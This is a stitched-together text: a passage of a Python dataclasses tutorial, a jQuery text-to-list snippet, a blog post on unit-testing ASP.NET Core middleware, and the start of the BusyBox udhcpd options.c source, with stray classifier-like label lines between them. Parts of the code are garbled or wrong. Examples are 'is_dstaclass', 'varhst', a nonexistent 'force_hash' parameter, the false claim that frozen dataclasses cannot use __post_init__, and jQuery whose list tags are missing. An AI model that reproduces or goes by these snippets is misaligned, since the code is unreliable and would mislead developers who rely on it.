dataclasses.InitVar from dataclasses import dataclass, is_dstaclass, asdict, InitVar @dataclass class Response: body: Any headers: dict = field(init=False, compare=False, default_factory=dict) status: int = 200 force_body_str: InitVar[bool] = True def stringify_body(self): """Returns a string representation of the value in body""" body = self.body if is_dataclass(body): body = asdict(body) if isinstance(body, dict): return json.dumps(body) if not isinstance(body, str): return str(body) return body def __post_init__(self, force_body_str): """Custom int logic. - Check if body is configured to force value as string - Calculate body's length and add corresponding header. """ if force_body_str: self.body = self.stringify_body() self.headers["Content-Length"] = getsizeof(self.body) Enter fullscreen mode Exit fullscreen mode We can easily configure if the value of body will be stored as string or not: >>> import logging >>> logging.basicConfig(level=logging.INFO) >>> # Create 200 response where 'body' will be stored as a dict. >>> resp = Response(body={"message": "Success"}, force_body_str=False) >>> logging.info(resp) ... INFO:root:Response(body={'message': 'Success'}, headers={'Content-Length': 232}, status=200) >>> # Create 200 response where 'body' will be stored as a string. >>> resp_str = Response(body={"message": "Success"}) >>> logging.info(resp) ... INFO:root:Response(body='{"message": "Success"}', headers={'Content-Length': 71}, status=200) Enter fullscreen mode Exit fullscreen mode Data classes that we can compare and order By default a data class implements __eq__. We can pass an order boolean argument to the @dataclass decorator to also implement __lt__ (less than), __le__ (less or equal), __gt__ (greater than) and __ge__ (greater or equal). The way these rich comparison methods are implemented take every defined field and compare them in the order they are defined until there's a value that's not equal. from dataclasses import dataclass @dataclass(order=True) class Response: body: str status: int = 200 Enter fullscreen mode Exit fullscreen mode The previous data class can now be compared using >=, <=, > and < operands. The best use case for this is when sorting: >>> resp_ok = Response(body="Success") >>> resp_error = Response(body="Error", status=500) >>> sorted([resp_ok, resp_error]) ... [Response(body='Error', status=500), Response(body='Success', status=200)] Enter fullscreen mode Exit fullscreen mode In this example resp_error goes before resp_ok because the unicode value of E is less than the unicode value of S. Note: implementing rich comparison methods allow us to easily sort objects. The implemented comparison methods will check the value of body, if both are equal it will continue to status. If the class had more fields the rest of the fields would be checked in order until a non-equal value is found. The previous example is valid but it does not make much sense to sort Response objects based on the body and status values. It makes more sense to sort them on the length of the body. We can specify which fields to use in comparison by using the field method: from dataclasses import dataclass, field from sys import getsizeof @dataclass(order=True) class Response: body: str = field(compare=False) status: int = field(compare=False, default=200) _content_length: int = field(compare=True, init=False) def __post_init__(self): """Calculate and store content length on init""" self._content_length = getsizeof(self.body) Enter fullscreen mode Exit fullscreen mode In the previous example we specified which fields are used when implementing comparison methods by passing a boolean compare parameter to the field method. This class will now be sorted by the size of the value of body. We can also judge if an instance is larger than another judging by the size of the value of body. >>> resp_ok = Response(body="Success") >>> resp_error = Response(body="Error", status=500) >>> sorted([resp_ok, re sp_error]) ...[Response(body='Error', status=500, _content_length=54), Response(body='Success', status=200, _content_length=56)] >>> # resp_error is smaller than resp_ok because >>> # "Error" is smaller than "Success" Enter fullscreen mode Exit fullscreen mode One downside of this implementation is that two given instances will be equal as long as the size of the body attribute is the same. >>> resp_ok = Response(body="Success") >>> resp_error = Response(body="Failure") >>> resp_ok == resp_error ... True >>> # both instances are equal because Success and Failure have the same amounts of chars >>> # and getsizeof() returns the same size for both strings. Enter fullscreen mode Exit fullscreen mode For equality it would be better to also check if the value of the body attribute is the same: from dataclasses import dataclass, field from sys import getsizeof @dataclass(order=True) class Response: _content_length: int = field(compare=True, init=False) body: str = field(compare=True) status: int = field(compare=False, default=200) def __post_init__(self): """Calculate and store content length on init""" self._content_length = getsizeof(self.body) Enter fullscreen mode Exit fullscreen mode By moving the _content_length field definition above body the length of the content will be used first for any comparisons. We also set the body field as a compare field. When checking for equality if the content length is the same the actual value of body will be checked, making for a better way to check for equality. >>> resp_ok = Response(body="Success") >>> resp_error = Response(body="Failure") >>> resp_ok == resp_error ... False Enter fullscreen mode Exit fullscreen mode This also works for sorting since response instances with the same content length will be sorted by the weight of the characters. Sorting will always yield the same order. >>> sorted([resp_ok, resp_error]) ... [Response(_content_length=56, body='Failure', status=200), Response(_content_length=56, body='Success', status=200)] Enter fullscreen mode Exit fullscreen mode Note: the order in which fields are defined matter for comparisons. Frozen or immutable instances We can create frozen instances by passing frozen=True to the @dataclass decorator. from dataclasses import dataclass, field @dataclass(frozen=True) class Response: body: str status: int = 200 Enter fullscreen mode Exit fullscreen mode This is helpful when you want to make sure read-only data is not mistakenly modified by your code or 3rd party libraries. If you try to modify a value a FrozenInstanceError exception will be raised: >>> resp_ok = Response(body="Success") >>> resp_ok.body = "Done!" ... dataclasses.FrozenInstanceError cannot assign to field 'body' Enter fullscreen mode Exit fullscreen mode In Python we cannot really have immutable objects. If you make an effort you can still modify a frozen data class instance: >>> import logging >>> logging.basicConfig(level=logging.INFO) >>> # Check values of 'resp_ok' >>> logging.info(resp_ok) ... INFO:root:Response(body='Success', status=200) >>> >>> object.__setattr__(resp_ok, "body", "Done!") >>> # We have modified a "frozen" instance >>> logging.info(resp_ok) ... INFO:root:Response(body='Done!', status=200) Enter fullscreen mode Exit fullscreen mode This is unlikely to happen but it's worth knowing. Note: use a frozen data class when using read-only data to avoid unwanted side-effects. Note: You cannot implement __post_init__ hook in a frozen data class. Replacing or updating an object instance The data classes module also offers a replace method which created a new instance using the same class. Any updates are passed as parameters: from dataclasses import dataclass, replace @dataclass(frozen=True) class Response: body: str status: int = 200 >>> import logging >>> logging.basicConfig(level=logging.INFO) >>> # Create 200 response >>> resp_ok = Response(body="Success") >>> logging.info(resp_ok) ... INFO:root:Response(body='Success', status=200) >>> # Replace instance >>> resp_ok = replace(resp_ok, body="OK") >>> logging.info(resp_ok) ... INFO:root:Response(body='OK', status=200) Enter fullscreen mode Exit fullscreen mode The value of body is updated and the value of status is copied over. Any reference to resp_ok is now pointing to the new, updated object. Note: using replace ensures _init_ and __post_init__ are run with the updated values. Adding class attributes In Python a class can have a class attribute, the difference from instance attributes are mainly these two: 1. Class attribute are defined outside __init__ 2. Every instance of the class will share the same value of a class attribute. We can define class attributes in a data class by using the pseudo-field typing.ClassVar from dataclasses import dataclass from typing import ClassVar, Any from sys import getsizeof from collections.abc import Callable @dataclass class Response: body: str _content_length: int = field(default=0, init=False) status: int = 200 getsize_fun: ClassVar[Callable[[Any], int]] = getsizeof def __post_init__(self): """Calculate content length by using getsize_fun""" self._content_length = self.getsize_fun(self.body) Enter fullscreen mode Exit fullscreen mode In this version of Response we can specify a function used to calculate the content's size. By default sys.getsizeof is used. from functools import reduce def calc_str_unicode_weight(self, string: str): """Calculates strn weight by adding each character's unicode value""" return reduce(lambda weight, char: weight+ord(char), string, 0) @dataclass class ResponseUnicode(Response): getsize_fun: ClassVar[Callable[[Any], int]] = calc_str_unicode_weight >>> import logging >>> logging.basicConfig(level=logging.INFO) >>> # Create 200 response, using getsizeof to calculate content length >>> resp_ok = Response(body="Success") >>> logging.info(resp_ok) ... INFO:root:Response(body='Success', _content_length=56, status=200) >>> # Override function to use when calculating content length >>> resp_ok_unicode = ResponseUnicode(body="Success") >>> logging.info(resp_ok_unicode) ... INFO:root:ResponseUnicode(body='Success', _content_length=729, status=200) Enter fullscreen mode Exit fullscreen mode To overwrite the functino used to calculate the content lenght we subclass Response and pass the function we want as getsize_fun Note: fields that use ClassVar are not used in data class mechanism like __init__, equality or comparison dunder methods. Inheritance in data classes When using inheritance with data classes fields are merged, meaning child classes can overwrite field definitions. Everything else works the same since the @dataclass decorator returns an old regular Python class. from dataclasses import dataclasses @dataclass class Response: body: str status: int headers: dict @dataclass class JSONResponse(Response): status: int = 200 headers: dict = field(default_factory=dict, init=False) def __post_init__(self): """automatically add Content-Type header""" self.headers["Content-Type"] = "application/json" Enter fullscreen mode Exit fullscreen mode In the previous example the parent class Response defined the basic fields and the children class JSONResponse overwrites the headers field and sets a default value for the status field. >>> import logging >>> logging.basicConfig(level=logging.INFO) >>> # Create 200 response >>> resp_ok = JSONResponse(body=json.dumps({"message": "OK"})) >>> logging.info(resp_ok) ... INFO:root:JSONResponse(body='{"message": "OK"}', status=200, headers={'Content-Type': 'application/json'}) Enter fullscreen mode Exit fullscreen mode Object hash The @dataclass decorator will automatically implement __hash__ method if the parameters frozen and eq are True. frozen is False by default and eq is True by default. from dataclasses import dataclass @dataclass(frozen=True) class Response: body: str status: int = 200 Enter fullscreen mode Exit fullscreen mode We can now use any instance of this class as a key in a dict or in a set. For I stance, we can create a mapping of responses to users >>> import logging >>> logging.basicConfig(level=logging.INFO) >>> # Create 200 response >>> resp_ok = Response(body="Success") >>> # Create 500 response >>> resp_error = Response(body="Error", status=500) >>> # Create a mapping of response -> usernames >>> responses_to_users = { ... resp_ok: ["j_mccain", "a_perez"], ... resp_error: ["d_dane", "b_rodriguez"] ... } >>> logging.info(responses_to_users[resp_ok]) ... INFO:root:['j_mccain', 'a_perez'] Enter fullscreen mode Exit fullscreen mode We can force a __hash__ function implementation even if we don't set frozen and eq to True by passing force_hash=True to the @dataclass decorator. This should only be used if you are 100% sure you need the functionality. A use case for data classes Throughout this article we've made different updates to a Response class which represents a simplified HTTP response object. Let's put everything together. For simplicity we're gonna write every class and function we're going to use in the same file, in really these should be spread out into sensible modules. Note: This is still not a 100% real HTTP response class, but it has enough information to see how we can use data classes import logging from sys import getsizeof from typing import ClassVar, Any, Optional, cast from collections.abc import Callable from dataclasses import dataclass, field, InitVar, asdict logging.basicConfig(level=logging.DEBUG) class APIException(Exception): """Custom API exception.""" def __init__(self, message: str, **kwargs): self.message = message; self.data: Dict[str: Any] = kwargs class PositiveNumberValidator: """Descriptor to make sure a value is a positive number""" def __set_name__(self, owner, name): self.name = f"_{name }" def __get__(self, obj, objtype=None): return getattr(obj, self.name) def __set__(self, obj, value): self.validate(value) setattr(obj, self.name, value) def validate(self, value): if not isinstance(value, int): raise AttributeError(f"value of '{self.name}' must be a number") if value < 0: raise AttributeError(f"value of '{self.name}'' must be a positive number") @dataclass(eq=False) class Pager: """Pager class. This class is to hold any pager related data sent in the response. The prev and next paramteres are meant to be links sent in the 'Link' header. """ page: int = cast(int,PositiveNumberValidator()) prev: str = "" next: str = "" @dataclass(order=True) class HTTPResponse: """Parent HTTPResponse This class can: 1. Ordered and compared by its content size and body using regular operators 2. Pass a 'content_type' string to be used as header value. 3. Update headers directly as a regular dictionary. 4. Customize the function to calculate content-length. """ _content_length: int = field(init=False) body: Any pager: Optional[Pager] = field(default=None, compare=False) headers: dict = field(default_factory=dict, init=False, compare=False) status: int = field(default=200, compare=False) content_type: InitVar[str] = "text/html" getsize_fun: ClassVar[Callable[[Any], int]] = getsizeof def __post_init__(self, content_type): """automatically calculate header values.""" self._content_length = self.getsize_fun(self.body) self.headers["Content-Length"] = self._content_length self.headers["Content-Type"] = content_type @dataclass(frozen=True) class JSONBody: """Class to hold data sent in a JSON Response. This class is immutable to avoid any unwanted modification of data. """ message: str data: dict @classmethod def from_exc(cls: type, exc: APIException): """Initializes a JSONBody object from an exception.""" return cls(message=str(exc), data=getattr(exc, "data", {})) @dataclass class JSONResponse(HTTPResponse): """Class to represent a JSON Response. Child of HTTPResponse.""" body: JSONBody content_type: InitVar[str] = "application/json" Enter fullscreen mode Exit fullscreen mode Here, we created a parent class HTTPResponse which will hold the basic data needed to send an HTTP response. Then, we created a JSONResponse class which inherits from HTTPResponse and overwrites body and content_type attributes. Overwriting these attributes allow us to specify a different default content type and a different type for the body. There is also a Pager class which is used to hold any data related to pagination that's sent in the response. The Pager class uses a descriptor to validate that page is always a positive number. And we also have a JSONBody which can be initialized by passing a message and a dictionary for data or can be initialized by passing an APIException instance. APIException is a custom exception we created to store an exception message and also some data related to said exception. Here's some basic examples how we can use these classes: 1. We can create a JSONResponse only by passing a JSONBody instance: >>> import logging >>> logging.basicConfig(level=logging.INFO) >>> body = JSONBody(message="Success", data={"values": ["value1", "value2"]}) >>> resp = JSONResponse(body) >>> logging.info("resp: %s", resp) ... INFO:root:resp: JSONResponse(_content_length=48, body=JSONBody(message='Success', data={'values': ['value1', 'value2']}), pager=None, headers={'Content-Length': 48, 'Content-Type': 'application/json'}, status=200) This is already a powerful class and the code needed to implement it is quite short 2. We can also pass a Pager instance to make it a more robust response: >>> pager = Pager(1, prev="?prev=0", next="?next=2") >>> resp = JSONResponse(body, pager=pager) >>> logging.info("resp: %s", resp) ... INFO:root:resp: JSONResponse(_content_length=48, body=JSONBody(message='Success', data={'values': ['value1', 'value2']}), pager=Pager(prev='?prev=0', next='?next=2'), headers={'Content-Length': 48, 'Content-Type': 'application/json'}, status=200) 3. We can easily conver data classes to dictionaries or tuples even when using nested data classes: >>> from dataclasses import asdict, astuple >>> logging.info("serialized resp: %s", asdict(resp)) ... INFO:root:serialized resp: {'_content_length': 48, 'body': {'message': 'Success', 'data': {'values': ['value1', 'value2']}}, 'pager': {'prev': '?prev=0', 'next': '?next=2'}, 'headers': {'Content-Length': 48, 'Content-Type': 'application/json'}, 'status': 200} >>> logging.info("resp as tuple: %s", astuple(resp)) ... INFO:root:resp astuple: (48, ('Success', {'values': ['value1', 'value2']}), ('?prev=0', '?next=2'), {'Content-Length': 48, 'Content-Type': 'application/json'}, 200) With a more real example we can see the strengths and weaknesses of data classes. Benefits of using data classes 1. We can create powerful classes with less code. 2. Type hints are enforced for every class and instance attribute. 3. We can customize how special dunder methods are implemented. 4. We can use data classes in the same way we use regular classes. In the previous example we used descriptors and class methods without an issue. 5. Inheritance can be used to make it easier to use data classes. 6. It's esier to serialize instsances to dictionaries or tuples. 7. We can mix regular classes and data classes. Disadvantages of using data classes 1. When creating data classes that can be compared and ordered the order in which you define the fields matters. Read-ability can take a hit because of this. It is recommended to try and separate fields by type. In the HTTPResponse class we have first private attributes, then instance attributes, init only parameters and class attributes. 2. Field definition order also matters when using default values. Since __init__ 's arguments are implemented using the same order the fields are defined, we have to first define attributes without default values and then attributes with default values. 3. When using frozen=True we cannot update values in __post_init__ 4. We have to manually optimize attribute access if needed. Meaning, adding __slots__. Real Python has a great example of this. I hope this article sheds some light on how and when to use data classes. If you like it, please follow this blog and make sure to follow me on twitter. Discussion (0)
__label__pos
0.77168
jQuery Convert Text to HTML List – $.stringToList This is a little jQuery utility function I wrote which simply converts text (ie – a long string) into a HTML list. It has a couple of settings for choosing conversion to Ordered List (OL) or Unordered List (UL). The delimiter for each item in the list is a full stop. Before --ADVERTISEMENT-- text-to-list(1) After text-to-list(2) jQuery.stringToList() /* * $.stringToList * jQuery Function to convert a block of text into a html list. * @requires: full stops after each sentence to match list elements * @param: list type: ul or ol * Usage: $('#inclusions').stringToList('ul'); * Author: Sam Deering */ $.fn.extend( { stringToList: function(listType) { var sentenceRegex = /[a-z0-9,'‘- ]+/igm, htmlList = ''; $.each($(this).html().match(sentenceRegex), function(i, v) { /* Remove blank elements */ if (v && (/[a-z0-9]+/igm.test(v)) && v != 'strong') { htmlList += ' • ' + v + ' • '; } }); htmlList += ''; $(this).html(htmlList); } }); /* Convert text to html list */ $('#inclusions').stringToList('ul'); Custom Namespace Version /* * $.stringToList - jQuery Function to convert a block of text into a html list. * @requires: full stops after each sentence to match list elements * @param: list type: ul or ol * Usage: FC.UTIL.stringToList($('#inclusions'),'ul'); */ stringToList: function(textContainer,listType) { var sentenceRegex = /[a-z0-9,'‘- ]+/igm, htmlList = ''; $.each(textContainer.html().match(sentenceRegex), function(i, v) { /* Remove blank elements */ if (v && (/[a-z0-9]+/igm.test(v)) && v != 'strong') { htmlList += ' • ' + v + ' • '; } }); htmlList += ''; textContainer.html(htmlList); } /* Convert text to html list */ NAMESPACE.stringToList('#inclusions','ul');
__label__pos
0.855
DEV Community Cover image for Unit testing a custom middleware in ASP.NET Core with Interface Harshal Suthar Harshal Suthar Posted on • Originally published at ifourtechnolab.com Unit testing a custom middleware in ASP.NET Core with Interface What is unit test? A unit test is a type of testing.It is the Small Part of code that can be logically in a Program and test that code is work properly that is testing. The latest versions of unit testing can be found in frameworks like JUnit, or testing tools like Test Complete. You will also find SUnit, which is the mother of all unit testing frameworks it is created by Kent Back. How does the tests look like? A unit can be almost anything you want it is, a line of code or a method, and a class. Smaller tests give you a more detail view of how your code is performing. There is also the practical aspect that when you test very small units, your tests can be run fast; like so many tests in a second fast. Consider this sample code def divider (x, y) return x/y End Enter fullscreen mode Exit fullscreen mode This example is simple, but it gives you an idea of what I mean by small. Small tests also have the benefit of building it harder to cross-systems from code into a database, or 3rd party system. There is not anything wrong with crossing systems, but there is a result like gradually slowing your tests, a test suite that takes hours to run. What is Middleware? Middleware’s are a fundamental part of an ASP.NET application, introduced from day one. They are executed in the order they are added on every request and could be considered similar to the HTTP Handlers and HTTP Modules of the classic ASP.NET. Since middleware’s can execute code before or after calling subsequent within the pipeline, they're considered ideal for plenty of varied application features, including exception handling, logging, authentication, etc. Read More: Ultimate Guide For Implementing Repository Pattern And Unit Of Work For .net Core Middleware is often tested in isolation with Test Server. It allows you to instantiate an app pipeline containing only the components that you simply got to test. Advantages of Middleware • Requests are sent in-memory instead of being serialized over the network. • Exceptions within the middleware can flow directly back to the calling test. • It's possible to customize server data structures, like HttpContext, directly within the test. Middleware’s offer a more powerful and flexible solution and for that, they need to be tested! Thankfully there's how to try to that so let's first see what we are getting to test then just get in there to Example: You can need to Install Microsoft.AspNetCore.Testhst First of All, you can need to Configure the processing pipeline to use the middleware for the test. part of program configure Processing pipeline is shown below. [Fact] public async Task MiddlewareTest_ReturnsNotFoundForRequest() { using varhst = await new hstBuilder().ConfigureWebhst(webBuilder => { webBuilder.UseTestServer().ConfigureServices(services => { services.AddMyServices(); }) .Configure(app => { app.UseMiddleware<mymiddleware>(); }); }) .StartAsync(); }</mymiddleware> Enter fullscreen mode Exit fullscreen mode After that you need to send requests with the HttpClient sample code is below. [Fact] public async Task MiddlewareTest_ReturnsNotFoundForRequest() { using varhst = await new hstBuilder().ConfigureWebhst(webBuilder => { webBuilder.UseTestServer().ConfigureServices(services => { services.AddMyServices(); }) .Configure(app => { app.UseMiddleware<mymiddleware>(); }); }) .StartAsync(); var response = await hst.GetTestClient().GetAsync("/"); }</mymiddleware> Enter fullscreen mode Exit fullscreen mode Assert the result and make an assertion of the opposite of the result that you expect. An embryonic run with a false positive assertion confirms that the test fails. when the middleware is performing Truly. Start test and confirm that the test is failed. In this example, the middleware returns a 404-status code which is NOT FOUND code when the root endpoint is requested. Make the first one test run with Assert.NotEqual (); which should be fail. [Fact] public async Task MiddlewareTest_ReturnsNotFoundForRequest() { using varhst = await new hstBuilder().ConfigureWebhst(webBuilder => { webBuilder.UseTestServer().ConfigureServices(services => { services.AddMyServices(); }) .Configure(app => { app.UseMiddleware<mymiddleware>(); }); }) .StartAsync(); var response = await hst.GetTestClient().GetAsync("/"); Assert.NotEqual(HttpStatusCode.NotFound, response.StatusCode); }</mymiddleware> Enter fullscreen mode Exit fullscreen mode Change the assertion for test the middleware under normal operating ambiance. The final test uses Assert.Equal( );. Run the test a second time to confirm that it was successful. [Fact] public async Task MiddlewareTest_ReturnsNotFoundForRequest() { using varhst = await new hstBuilder() .ConfigureWebhst(webBuilder => { webBuilder.UseTestServer().ConfigureServices(services => { services.AddMyServices(); }) .Configure(app => { app.UseMiddleware<mymiddleware>(); }); }) .StartAsync(); var response = await hst.GetTestClient().GetAsync("/"); Assert.Equal(HttpStatusCode.NotFound, response.StatusCode); }</mymiddleware> Enter fullscreen mode Exit fullscreen mode Looking to Hire Dedicated .NET Core Developer? Contact Now. Send requests with HttpContext A test app is also sending a request using SendAsync(Action, CancellationToken). In this example, several checks are made when https:// example. com/A/Path/?and=query is done by the middleware. [Fact] public async Task TestMiddleware_ExpectedResponse() { using varhst = await new hstBuilder() .ConfigureWebhst(webBuilder => { webBuilder.UseTestServer().ConfigureServices(services => { services.AddMyServices(); }) .Configure(app => { app.UseMiddleware<mymiddleware>(); }); }) .StartAsync(); var server = hst.GetTestServer(); server.BaseAddress = new Uri("https://example.com/A/Path/"); var context = await server.SendAsync(c => { c.Request.Method = HttpMethods.Post; c.Request.Path = "/and/file.txt"; c.Request.QueryString = new QueryString("?and=query"); }); Assert.True(context.RequestAborted.CanBeCanceled); Assert.Equal(HttpProtocol.Http11, context.Request.Protocol); Assert.Equal("POST", context.Request.Method); Assert.Equal("https", context.Request.Scheme); Assert.Equal("example.com", context.Request.hst.Value); Assert.Equal("/A/Path", context.Request.PathBase.Value); Assert.Equal("/and/file.txt", context.Request.Path.Value); Assert.Equal("?and=query", context.Request.QueryString.Value); Assert.NotNull(context.Request.Body); Assert.NotNull(context.Request.Headers); Assert.NotNull(context.Response.Headers); Assert.NotNull(context.Response.Body); Assert.Equal(404, context.Response.StatusCode); Assert.Null(context.Features.Get<ihttpresponsefeature>().ReasonPhrase); } </ihttpresponsefeature></mymiddleware> Enter fullscreen mode Exit fullscreen mode SendAsync allow the direct configuration of an HttpContext object instead of using the HttpClient abstractions. Use SendAsync to control structures only available on the server, like HttpContext.Items or HttpContext.Features. As with the Previous example that tested for a 404 - Not Found response, check the other for every assert statement within the preceding test. The check confirms that the test fails correctly when the middleware is working normally. After you've confirmed that the false-positive test works, set the ultimate assert statements for the expected conditions and values of the test. Run it again to verify that the test passes. Conclusion Using Middleware unit testing you can test parts of code which is placed in program. You can also get more detail result of your testing. Using these you can customize data structures, like HttpContext, directly within the test. You can test from both sides correct or wrong.We hope this blog will be helpful for you to understand concept of unit testing a custom middleware in ASP.NET Core. Top comments (0)
__label__pos
0.755652
You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long. libowfat/io/iob_write.3 38 lines 1.4 KiB Groff .TH iob_write 3 .SH NAME iob_write \- send I/O batch through callback .SH SYNTAX .B #include <iob.h> typedef int64 (*io_write_callback)(int64 s,const void* buf,uint64 n); int64 \fBiob_write\fR(int64 s,io_batch* b,io_write_callback cb); .SH DESCRIPTION iob_write sends the (rest of) \fIb\fR through the callback \fIcb\fR, passing \fIs\fR as first argument. \fIcb\fR is expected to behave like io_trywrite(2). This interface is intended to send an I/O batch through a filter, for example to encrypt or compress it. If you just want to send an I/O batch to a socket, use iob_send instead. iob_write returns the number of bytes written, 0 if there were no more bytes to be written in the batch, -1 for EAGAIN, or -3 for a permanent error (for example "connection reset by peer"). The normal usage pattern is using io_wait to know when a descriptor is writable, and then calling iob_write until it returns 0, -1 or -3. If it returns 0, terminate the loop (everything was written OK). If it returns -1, call io_wait again. If it returned -3, signal an error. .SH NOTE iob_write will continue to call your callback until it returns an error. So if you are in a state machine, for example a web server using this for SSL support, make sure to write at most n bytes at a time (e.g. 64k) and the next time you are called return -1. Otherwise iob_write might not return until the whole file is served. .SH "SEE ALSO" iob_send(3)
__label__pos
0.982596
KAPEC GEOTASK? • The learning process is entertaining and exciting • The solved tasks turn into coordinates • The chance to follow your progress • Along with your schoolmates and friends, go on an adventure, searching for hideouts Contact info • E-mail: 1453.1. Conditioned inequality properties. Write the correct answer! Simplify in-equation x-3>4x-3 (if all number fits, type R, if no one fits type U)! x< Grade: 7 Subject Algebra Theme Inequalities Subtheme Conditioned in-equation concept Solve tasks to find hidden Geo point coordinates 1. Geometry: Inner unilateral and cross angles, alternate interiour angles, parallel straight lines, properties, and parallel signs. 2. Algebra: Linear function y = kx + b 3. Geometry: Angle, angle edges and peak, value, degree, measurement. 4. Geometry: Isosceles triangle, side edge, triangle basis, equilateral triangle, line segment mid-perpendicular, connection between angles and edges in triangle 5. Algebra: Equivalent equations. 6. Geometry: Point belongs (or not) to the straight line (beam, line segment), half-plane, crossed straight lines, beam, opposite beams, line segment, properties. 7. Geometry: Equal figures, line segments, lengths, midpoints, distance between two points. 8. Algebra: Polynomial highest term. 9. Algebra: Equivalent inequalities 10. Algebra: Percent and proportions 11. Algebra: Numerical connections 12. Algebra: Numerical module 13. Algebra: Independent variable (argument) and dependent fixed (function) 14. Algebra: Linear equations ax + b = 0, where a, b ∈ Q. 15. Algebra: Opposite type inequalities. 16. Geometry: Three point mutual arrangement. 17. Algebra: Point coordinates 18. Algebra: Degree with negative index 19. Algebra: Linear function y = kx + b 20. Algebra: Identical expressions. 21. Algebra: Numerical module 22. Geometry: Angle, angle edges and peak, value, degree, measurement. 23. Algebra: Direct proportionality concept 24. Algebra: Trinomial. 25. Algebra: Equivalent equations. 26. Algebra: Contracted multiplication formula: addition and subtraction square; square difference. 27. Algebra: Polynomial normal form. 28. Algebra: Linear inequalities ax + b > 0, where a, b ∈ Q 29. Algebra: Point coordinates 30. Algebra: Mathematics expression. Algebraic expression. 31. Geometry: Inner unilateral and cross angles, alternate interiour angles, parallel straight lines, properties, and parallel signs. 32. Algebra: Identical expressions. 33. Algebra: Linear inequalities ax + b > 0, where a, b ∈ Q 34. Algebra: Numerical equalities. 35. Algebra: Letter - variable. 36. Geometry: Point belongs (or not) to the straight line (beam, line segment), half-plane, crossed straight lines, beam, opposite beams, line segment, properties. 37. Algebra: Linear function y = kx + b 38. Algebra: Monomial (1. degree). 39. Algebra: Binomial. 40. Algebra: Identical expressions. 41. Geometry: Narrow, wide, straight, extended, opened, full angle. Equal angles, bisector. 42. Algebra: Conditioned inequality properties.
__label__pos
0.996688
double difftime(time_t time1, time_t time0) 1.0、参考 1.1、此函数的作用 比较time0time1相差多少 1.2、参数说明 time_t的定义: typedef long int __time_t; typedef __time_t time_t; time_t表示从1970-01-01 00:00:00,到某个时间点,所经过的数, 它是相对时间。 time_t是一个有符号数,也就是它也可以是负数,表示1970-01-01 00:00:00之前的时间。 1.3、返回值说明 返回(double)(time1 - time0) 1.4、使用示例 #include <stdio.h> #include <time.h> #include <unistd.h> int main() { time_t startT = time(NULL); sleep(2); time_t endT = time(NULL); double deltaT = difftime(endT, startT); printf("耗时%f秒\n", deltaT); return 0; } 使用gcc命令编译 ⤵︎ gcc -o test_time test.c 运行结果如下 ⤵︎ 耗时2.000000秒
__label__pos
0.958319
/* vi: set sw=4 ts=4: */ /* * options.c -- DHCP server option packet tools * Rewrite by Russ Dill July 2001 */ #include "common.h" #include "dhcpd.h" #include "options.h" /* Supported options are easily added here */ const struct dhcp_option dhcp_options[] = { /* flags code */ { OPTION_IP | OPTION_REQ, 0x01 }, /* DHCP_SUBNET */ { OPTION_S32 , 0x02 }, /* DHCP_TIME_OFFSET */ { OPTION_IP | OPTION_LIST | OPTION_REQ, 0x03 }, /* DHCP_ROUTER */ { OPTION_IP | OPTION_LIST , 0x04 }, /* DHCP_TIME_SERVER */ { OPTION_IP | OPTION_LIST , 0x05 }, /* DHCP_NAME_SERVER */ { OPTION_IP | OPTION_LIST | OPTION_REQ, 0x06 }, /* DHCP_DNS_SERVER */ { OPTION_IP | OPTION_LIST , 0x07 }, /* DHCP_LOG_SERVER */ { OPTION_IP | OPTION_LIST , 0x08 }, /* DHCP_COOKIE_SERVER */ { OPTION_IP | OPTION_LIST , 0x09 }, /* DHCP_LPR_SERVER */ { OPTION_STRING | OPTION_REQ, 0x0c }, /* DHCP_HOST_NAME */ { OPTION_U16 , 0x0d }, /* DHCP_BOOT_SIZE */ { OPTION_STRING | OPTION_LIST | OPTION_REQ, 0x0f }, /* DHCP_DOMAIN_NAME */ { OPTION_IP , 0x10 }, /* DHCP_SWAP_SERVER */ { OPTION_STRING , 0x11 }, /* DHCP_ROOT_PATH */ { OPTION_U8 , 0x17 }, /* DHCP_IP_TTL */ { OPTION_U16 , 0x1a }, /* DHCP_MTU */ { OPTION_IP | OPTION_REQ, 0x1c }, /* DHCP_BROADCAST */ { OPTION_STRING , 0x28 }, /* nisdomain */ { OPTION_IP | OPTION_LIST , 0x29 }, /* nissrv */ { OPTION_IP | OPTION_LIST | OPTION_REQ, 0x2a }, /* DHCP_NTP_SERVER */ { OPTION_IP | OPTION_LIST , 0x2c }, /* DHCP_WINS_SERVER */ { OPTION_IP , 0x32 }, /* DHCP_REQUESTED_IP */ { OPTION_U32 , 0x33 }, /* DHCP_LEASE_TIME */ { OPTION_U8 , 0x35 }, /* dhcptype */ { OPTION_IP , 0x36 }, /* DHCP_SERVER_ID */ { OPTION_STRING , 0x38 }, /* DHCP_MESSAGE */ { OPTION_STRING , 0x3C }, /* DHCP_VENDOR */ { OPTION_STRING , 0x3D }, /* DHCP_CLIENT_ID */ { OPTION_STRING , 0x42 }, /* tftp */ { OPTION_STRING , 0x43 }, /* bootfile */ { OPTION_STRING , 0x4D }, /* userclass */ #if ENABLE_FEATURE_RFC3397 { OPTION_STR1035 | OPTION_LIST , 0x77 }, /* search */ #endif /* MSIE's "Web Proxy Autodiscovery Protocol" support */ { OPTION_STRING , 0xfc }, /* wpad */ /* Options below have no match in dhcp_option_strings[], * are not passed to dhcpc scripts, and cannot be specified * with "option XXX YYY" syntax in dhcpd config file. */ { OPTION_U16 , 0x39 }, /* DHCP_MAX_SIZE */ { } /* zeroed terminating entry */ }; /* Used for converting options from incoming packets to env variables * for udhcpc stript */ /* Must match dhcp_options[] order */ const char dhcp_option_strings[] ALIGN1 = "subnet" "\0" /* DHCP_SUBNET */ "timezone" "\0" /* DHCP_TIME_OFFSET */ "router" "\0" /* DHCP_ROUTER */ "timesrv" "\0" /* DHCP_TIME_SERVER */ "namesrv" "\0" /* DHCP_NAME_SERVER */ "dns" "\0" /* DHCP_DNS_SERVER */ "logsrv" "\0" /* DHCP_LOG_SERVER */ "cookiesrv" "\0" /* DHCP_COOKIE_SERVER */ "lprsrv" "\0" /* DHCP_LPR_SERVER */ "hostname" "\0" /* DHCP_HOST_NAME */ "bootsize" "\0" /* DHCP_BOOT_SIZE */ "domain" "\0" /* DHCP_DOMAIN_NAME */ "swapsrv" "\0" /* DHCP_SWAP_SERVER */ "rootpath" "\0" /* DHCP_ROOT_PATH */ "ipttl" "\0" /* DHCP_IP_TTL */ "mtu" "\0" /* DHCP_MTU */ "broadcast" "\0" /* DHCP_BROADCAST */ "nisdomain" "\0" /* */ "nissrv" "\0" /* */ "ntpsrv" "\0" /* 